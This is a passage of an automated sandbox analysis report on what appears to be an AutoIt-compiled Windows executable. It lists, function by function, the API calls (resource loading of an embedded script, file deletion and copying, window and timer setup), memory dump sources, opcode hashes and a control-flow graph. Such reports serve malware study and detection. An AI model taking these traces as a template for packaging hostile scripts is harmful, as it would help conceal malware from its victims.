                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,0030449E,?,?,00000000,00000001), ref: 0030407B
                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,0030449E,?,?,00000000,00000001), ref: 00304092
                                                                            • LoadResource.KERNEL32(?,00000000,?,?,0030449E,?,?,00000000,00000001,?,?,?,?,?,?,003041FB), ref: 00374F1A
                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,0030449E,?,?,00000000,00000001,?,?,?,?,?,?,003041FB), ref: 00374F2F
                                                                            • LockResource.KERNEL32(0030449E,?,?,0030449E,?,?,00000000,00000001,?,?,?,?,?,?,003041FB,00000000), ref: 00374F42
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                            • String ID: SCRIPT
                                                                            • API String ID: 3051347437-3967369404
                                                                            • Opcode ID: 3c81e1f0514062448b3d38b0ffabe78c9f1f696d244c8a5557cb4f13c68cd931
                                                                            • Instruction ID: 091bf58d5c650238b34c4f86a261a9a43f9417b91505d94a484f0e603ddd6672
                                                                            • Opcode Fuzzy Hash: 3c81e1f0514062448b3d38b0ffabe78c9f1f696d244c8a5557cb4f13c68cd931
                                                                            • Instruction Fuzzy Hash: AC113071200705BFE7228B65EC58F67BBBDEBC5B51F1045ACF60696290DB71DD048B20
                                                                            Function 00346CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetFileAttributesW.KERNELBASE(?,00372F49), ref: 00346CB9
                                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 00346CCA
                                                                            • FindClose.KERNEL32(00000000), ref: 00346CDA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: FileFind$AttributesCloseFirst
                                                                            • String ID:
                                                                            • API String ID: 48322524-0
                                                                            • Opcode ID: 62ff687ff2b5305b3390835378a48324c2c40461244706612ff6d65f1f1daeba
                                                                            • Instruction ID: c8725c66344b2ba51544de1be2f4e8f29bfb4f43dbef402bda0e251461ef1929
                                                                            • Opcode Fuzzy Hash: 62ff687ff2b5305b3390835378a48324c2c40461244706612ff6d65f1f1daeba
                                                                            • Instruction Fuzzy Hash: 4FE048318146155786116B38EC4E8E977ACDE06339F104755F575C51D0E770ED4446D6
                                                                            Function 0030E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0030E959
                                                                            • timeGetTime.WINMM ref: 0030EBFA
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0030ED2E
                                                                            • TranslateMessage.USER32(?), ref: 0030ED3F
                                                                            • DispatchMessageW.USER32(?), ref: 0030ED4A
                                                                            • LockWindowUpdate.USER32(00000000), ref: 0030ED79
                                                                            • DestroyWindow.USER32 ref: 0030ED85
                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0030ED9F
                                                                            • Sleep.KERNEL32(0000000A), ref: 00375270
                                                                            • TranslateMessage.USER32(?), ref: 003759F7
                                                                            • DispatchMessageW.USER32(?), ref: 00375A05
                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00375A19
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                            • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                            • API String ID: 2641332412-570651680
                                                                            • Opcode ID: 5a850bbd6473f76f1c2ce3b1ed7b9a763a17a555737fb64eaaf211c0078480f5
                                                                            • Instruction ID: 1894efc84bb2abe3d1a8341f3e9963a418366e1b8d0f409e100abb075e9171f5
                                                                            • Opcode Fuzzy Hash: 5a850bbd6473f76f1c2ce3b1ed7b9a763a17a555737fb64eaaf211c0078480f5
                                                                            • Instruction Fuzzy Hash: 4B62A370609340DFDB2ADF24C895BAA77E8BF45304F04496DE94A8F2D2DBB5E844CB52
                                                                            Function 00335C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ___createFile.LIBCMT ref: 00335EC3
                                                                            • ___createFile.LIBCMT ref: 00335F04
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00335F2D
                                                                            • __dosmaperr.LIBCMT ref: 00335F34
                                                                            • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00335F47
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00335F6A
                                                                            • __dosmaperr.LIBCMT ref: 00335F73
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00335F7C
                                                                            • __set_osfhnd.LIBCMT ref: 00335FAC
                                                                            • __lseeki64_nolock.LIBCMT ref: 00336016
                                                                            • __close_nolock.LIBCMT ref: 0033603C
                                                                            • __chsize_nolock.LIBCMT ref: 0033606C
                                                                            • __lseeki64_nolock.LIBCMT ref: 0033607E
                                                                            • __lseeki64_nolock.LIBCMT ref: 00336176
                                                                            • __lseeki64_nolock.LIBCMT ref: 0033618B
                                                                            • __close_nolock.LIBCMT ref: 003361EB
                                                                              • Part of subcall function 0032EA9C: CloseHandle.KERNELBASE(00000000,003AEEF4,00000000,?,00336041,003AEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0032EAEC
                                                                              • Part of subcall function 0032EA9C: GetLastError.KERNEL32(?,00336041,003AEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0032EAF6
                                                                              • Part of subcall function 0032EA9C: __free_osfhnd.LIBCMT ref: 0032EB03
                                                                              • Part of subcall function 0032EA9C: __dosmaperr.LIBCMT ref: 0032EB25
                                                                              • Part of subcall function 00327C0E: __getptd_noexit.LIBCMT ref: 00327C0E
                                                                            • __lseeki64_nolock.LIBCMT ref: 0033620D
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00336342
                                                                            • ___createFile.LIBCMT ref: 00336361
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0033636E
                                                                            • __dosmaperr.LIBCMT ref: 00336375
                                                                            • __free_osfhnd.LIBCMT ref: 00336395
                                                                            • __invoke_watson.LIBCMT ref: 003363C3
                                                                            • __wsopen_helper.LIBCMT ref: 003363DD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                            • String ID: @
                                                                            • API String ID: 3896587723-2766056989
                                                                            • Opcode ID: 834686de6645ce8cedaf155be5ade5c3a32aa6b6fc071c2f9ba54256c73ad575
                                                                            • Instruction ID: d7c8e73098f8658264364f1ba5548ff5e596afca8aee607f1ec67de71e42f3a8
                                                                            • Opcode Fuzzy Hash: 834686de6645ce8cedaf155be5ade5c3a32aa6b6fc071c2f9ba54256c73ad575
                                                                            • Instruction Fuzzy Hash: A8221671904605AFEB2B9F68DCC6BEE7B75EB10324F268229E521DB2E1C3358D50C791
                                                                            Function 0034FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • _wcscpy.LIBCMT ref: 0034FA96
                                                                            • _wcschr.LIBCMT ref: 0034FAA4
                                                                            • _wcscpy.LIBCMT ref: 0034FABB
                                                                            • _wcscat.LIBCMT ref: 0034FACA
                                                                            • _wcscat.LIBCMT ref: 0034FAE8
                                                                            • _wcscpy.LIBCMT ref: 0034FB09
                                                                            • __wsplitpath.LIBCMT ref: 0034FBE6
                                                                            • _wcscpy.LIBCMT ref: 0034FC0B
                                                                            • _wcscpy.LIBCMT ref: 0034FC1D
                                                                            • _wcscpy.LIBCMT ref: 0034FC32
                                                                            • _wcscat.LIBCMT ref: 0034FC47
                                                                            • _wcscat.LIBCMT ref: 0034FC59
                                                                            • _wcscat.LIBCMT ref: 0034FC6E
                                                                              • Part of subcall function 0034BFA4: _wcscmp.LIBCMT ref: 0034C03E
                                                                              • Part of subcall function 0034BFA4: __wsplitpath.LIBCMT ref: 0034C083
                                                                              • Part of subcall function 0034BFA4: _wcscpy.LIBCMT ref: 0034C096
                                                                              • Part of subcall function 0034BFA4: _wcscat.LIBCMT ref: 0034C0A9
                                                                              • Part of subcall function 0034BFA4: __wsplitpath.LIBCMT ref: 0034C0CE
                                                                              • Part of subcall function 0034BFA4: _wcscat.LIBCMT ref: 0034C0E4
                                                                              • Part of subcall function 0034BFA4: _wcscat.LIBCMT ref: 0034C0F7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                            • String ID: >>>AUTOIT SCRIPT<<<$t2;
                                                                            • API String ID: 2955681530-1029947341
                                                                            • Opcode ID: 9a01b10c15c8aecb3f064c4ee9d5176dead5cc609b62f7699c6b55ba5c9a66f3
                                                                            • Instruction ID: 57340399d09f4ca0bd0f9b38c572e40398830e3436895ace9102fb40faedab0f
                                                                            • Opcode Fuzzy Hash: 9a01b10c15c8aecb3f064c4ee9d5176dead5cc609b62f7699c6b55ba5c9a66f3
                                                                            • Instruction Fuzzy Hash: 77919171504215AFCB16EB54C891F9AB3E8FF44310F044869F9899F292DB30FA48CB92
                                                                            Function 0032EE0E Relevance: 26.2, APIs: 17, Instructions: 664COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 3074181302-0
                                                                            • Opcode ID: 1dee04cb80dbc945d6554f2a81b32c1abdb268821ddf11a06652883bc76cf13d
                                                                            • Instruction ID: 180537146960f792f9e262381edc583357729d34a3d950be1299f81299e88082
                                                                            • Opcode Fuzzy Hash: 1dee04cb80dbc945d6554f2a81b32c1abdb268821ddf11a06652883bc76cf13d
                                                                            • Instruction Fuzzy Hash: 4C324974A042A5DFDB23CF68F840BBD7BB5AF46314F2A4179E8559F292C7709841CBA0
                                                                            Function 0034BFA4 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 316fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 0034BDB4: __time64.LIBCMT ref: 0034BDBE
                                                                              • Part of subcall function 00304517: _fseek.LIBCMT ref: 0030452F
                                                                            • __wsplitpath.LIBCMT ref: 0034C083
                                                                              • Part of subcall function 00321DFC: __wsplitpath_helper.LIBCMT ref: 00321E3C
                                                                            • _wcscpy.LIBCMT ref: 0034C096
                                                                            • _wcscat.LIBCMT ref: 0034C0A9
                                                                            • __wsplitpath.LIBCMT ref: 0034C0CE
                                                                            • _wcscat.LIBCMT ref: 0034C0E4
                                                                            • _wcscat.LIBCMT ref: 0034C0F7
                                                                            • _wcscmp.LIBCMT ref: 0034C03E
                                                                              • Part of subcall function 0034C56D: _wcscmp.LIBCMT ref: 0034C65D
                                                                              • Part of subcall function 0034C56D: _wcscmp.LIBCMT ref: 0034C670
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0034C2A1
                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0034C338
                                                                            • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0034C34E
                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0034C35F
                                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0034C371
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                            • String ID: p1v`Kv
                                                                            • API String ID: 2378138488-2864719405
                                                                            • Opcode ID: b4886646d6db2967928ae1eaef40924ae12cf137deec1d4e5ad14eafda1256b0
                                                                            • Instruction ID: 6e9ab7de453569ee6df93839581d715959ef38384ac1d66b34038a94fc084b94
                                                                            • Opcode Fuzzy Hash: b4886646d6db2967928ae1eaef40924ae12cf137deec1d4e5ad14eafda1256b0
                                                                            • Instruction Fuzzy Hash: FAC12EB1E11229AFDF52DF95CC81EDEB7BDAF49310F0040A6F609EA151DB70AA448F61
                                                                            Function 00303F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00303F86
                                                                            • RegisterClassExW.USER32(00000030), ref: 00303FB0
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00303FC1
                                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00303FDE
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00303FEE
                                                                            • LoadIconW.USER32(000000A9), ref: 00304004
                                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00304013
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                            • API String ID: 2914291525-1005189915
                                                                            • Opcode ID: 90b76c70a8c9f60a8fd93860144e44842dc4b110b16a1fc5f5f9b976770c103a
                                                                            • Instruction ID: 0667313c22381a0e9b65dae55e9d77a2d8867655adf03696bd8c9fb154e745e3
                                                                            • Opcode Fuzzy Hash: 90b76c70a8c9f60a8fd93860144e44842dc4b110b16a1fc5f5f9b976770c103a
                                                                            • Instruction Fuzzy Hash: 5E21C7B5900318AFDB02EFA4EC89BCDBBB8FB09714F10421AFA11E62A0D7B45554DF91
                                                                            Function 00303742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1175 303742-303762 1177 3037c2-3037c4 1175->1177 1178 303764-303767 1175->1178 1177->1178 1181 3037c6 1177->1181 1179 3037c8 1178->1179 1180 303769-303770 1178->1180 1182 371e00-371e2e call 302ff6 call 31e312 1179->1182 1183 3037ce-3037d1 1179->1183 1184 303776-30377b 1180->1184 1185 30382c-303834 PostQuitMessage 1180->1185 1186 3037ab-3037b3 DefWindowProcW 1181->1186 1222 371e33-371e3a 1182->1222 1187 3037d3-3037d4 1183->1187 1188 3037f6-30381d SetTimer RegisterWindowMessageW 1183->1188 1190 303781-303783 1184->1190 1191 371e88-371e9c call 344ddd 1184->1191 1192 3037f2-3037f4 1185->1192 1193 3037b9-3037bf 1186->1193 1194 371da3-371da6 1187->1194 1195 3037da-3037ed KillTimer call 303847 call 30390f 1187->1195 1188->1192 1197 30381f-30382a CreatePopupMenu 1188->1197 1198 303836-303845 call 31eb83 1190->1198 1199 303789-30378e 1190->1199 1191->1192 1214 371ea2 1191->1214 1192->1193 1207 371ddc-371dfb MoveWindow 1194->1207 1208 371da8-371daa 1194->1208 1195->1192 1197->1192 1198->1192 1203 303794-303799 1199->1203 1204 371e6d-371e74 1199->1204 1212 371e58-371e68 call 3455bd 1203->1212 1213 30379f-3037a5 1203->1213 1204->1186 1210 371e7a-371e83 call 33a5f3 1204->1210 1207->1192 1216 371dac-371daf 1208->1216 1217 371dcb-371dd7 SetFocus 1208->1217 1210->1186 1212->1192 1213->1186 1213->1222 1214->1186 1216->1213 1218 371db5-371dc6 call 302ff6 1216->1218 1217->1192 1218->1192 1222->1186 1226 371e40-371e53 call 303847 call 304ffc 1222->1226 1226->1186
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 003037B3
                                                                            • KillTimer.USER32(?,00000001), ref: 003037DD
                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00303800
                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0030380B
                                                                            • CreatePopupMenu.USER32 ref: 0030381F
                                                                            • PostQuitMessage.USER32(00000000), ref: 0030382E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                            • String ID: TaskbarCreated
                                                                            • API String ID: 129472671-2362178303
                                                                            • Opcode ID: f2a7ed0885ac880fc0ade78815c2dc518397d91121006ed77eda70ccc5c79c64
                                                                            • Instruction ID: 9a8cc70e2c0d0f65004b8497fe2ffac7f8c12d92efb0c257115400d7ae461a1d
                                                                            • Opcode Fuzzy Hash: f2a7ed0885ac880fc0ade78815c2dc518397d91121006ed77eda70ccc5c79c64
                                                                            • Instruction Fuzzy Hash: 874199F610120AABDB235F28DC6AF7A379DFB41B00F004119F902D64D3DB64EE50A762
                                                                            Function 00303E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 00303E79
                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00303E88
                                                                            • LoadIconW.USER32(00000063), ref: 00303E9E
                                                                            • LoadIconW.USER32(000000A4), ref: 00303EB0
                                                                            • LoadIconW.USER32(000000A2), ref: 00303EC2
                                                                              • Part of subcall function 00304024: LoadImageW.USER32(00300000,00000063,00000001,00000010,00000010,00000000), ref: 00304048
                                                                            • RegisterClassExW.USER32(?), ref: 00303F30
                                                                              • Part of subcall function 00303F53: GetSysColorBrush.USER32(0000000F), ref: 00303F86
                                                                              • Part of subcall function 00303F53: RegisterClassExW.USER32(00000030), ref: 00303FB0
                                                                              • Part of subcall function 00303F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00303FC1
                                                                              • Part of subcall function 00303F53: InitCommonControlsEx.COMCTL32(?), ref: 00303FDE
                                                                              • Part of subcall function 00303F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00303FEE
                                                                              • Part of subcall function 00303F53: LoadIconW.USER32(000000A9), ref: 00304004
                                                                              • Part of subcall function 00303F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00304013
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                            • String ID: #$0$AutoIt v3
                                                                            • API String ID: 423443420-4155596026
                                                                            • Opcode ID: ffa3271aa636ee35b86bf939d878594df32b4e76450e2ff93de2dcde2291920f
                                                                            • Instruction ID: e219952eda4572c7da001942e44ad31b74d1770bea7f7bda0109749b60d2fd0b
                                                                            • Opcode Fuzzy Hash: ffa3271aa636ee35b86bf939d878594df32b4e76450e2ff93de2dcde2291920f
                                                                            • Instruction Fuzzy Hash: 9B215EB0D00314AFCB42DFA9EC45E9ABBF9FB49314F14412AE204E62A1D77566509F91
                                                                            Function 0032ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
